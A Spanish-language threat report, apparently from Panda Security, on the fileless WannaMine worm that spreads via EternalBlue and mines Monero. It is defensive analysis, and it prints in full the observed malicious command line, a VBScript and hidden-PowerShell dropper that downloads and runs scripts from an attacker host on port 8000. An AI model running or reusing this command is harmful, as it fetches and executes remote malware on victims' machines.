Panda Security, descubre un nuevo gusano que utiliza therramientas de hacking como scripts para propagarse por redes corporativas y minar la criptomoneda Monero.
Buatizado como Fileless Monero WannaMine esta nueva amenaza aúna dos de las más peligrosas tendencias en ciberseguridad: los ataques fileless (sin fichero, más difíciles de detectar) enfocado en minería de la criptomoneda Monero utilizando además el exploit EtenernalBlue, como hizo WannaCry en su momento.
Desde Adaptive Defense monitorizamos en tiempo real todos los procesos que están en ejecución en todas las máquinas donde está instalado, por lo que cuando nuestro equipo de Threat Hunting vio el siguiente comando tratando de ser ejecutado por uno de los procesos de un equipo, saltaron las alarmas:
CMD /V:ON /C FOR /F “TOKENS=2 DELIMS=.[” %I IN (‘VER’) DO (SET A=%I)&IF !A:~-1!==5 (@ECHO ON ERROR RESUME NEXT>%WINDIR%\11.VBS&@ECHO SET OX=CREATEOBJECT^(“MSXML2.XMLHTTP”^)>>%WINDIR%\11.VBS&@ECHO OX.OPEN “GET”,”HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO.VBS“,FALSE>>%WINDIR%\11.VBS&@ECHO OX.SETREQUESTHEADER “USER-AGENT”, “-“>>%WINDIR%\11.VBS&@ECHO OX.SEND^(^)>>%WINDIR%\11.VBS&@ECHO IF OX.STATUS=200 THEN>>%WINDIR%\11.VBS&@ECHO SET OAS=CREATEOBJECT^(“ADODB.STREAM”^)>>%WINDIR%\11.VBS&@ECHO OAS.OPEN>>%WINDIR%\11.VBS&@ECHO OAS.TYPE=1 >>%WINDIR%\11.VBS&@ECHO OAS.WRITE OX.RESPONSEBODY>>%WINDIR%\11.VBS&@ECHO OAS.SAVETOFILE “%WINDIR%\INFO.VBS”,2 >>%WINDIR%\11.VBS&@ECHO OAS.CLOSE>>%WINDIR%\11.VBS&@ECHO END IF>>%WINDIR%\11.VBS&@ECHO SET OS=CREATEOBJECT^(“WSCRIPT.SHELL”^)>>%WINDIR%\11.VBS&@ECHO OS.EXEC^(“CSCRIPT.EXE %WINDIR%\INFO.VBS”^)>>%WINDIR%\11.VBS&CSCRIPT.EXE %WINDIR%\11.VBS) ELSE (POWERSHELL -NOP -NONI -W HIDDEN “IF((GET-WMIOBJECT WIN32_OPERATINGSYSTEM).OSARCHITECTURE.CONTAINS(’64’)){IEX(NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING(‘HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO6.PS1′)}ELSE{IEX(NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING(‘HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO3.PS1′)}“).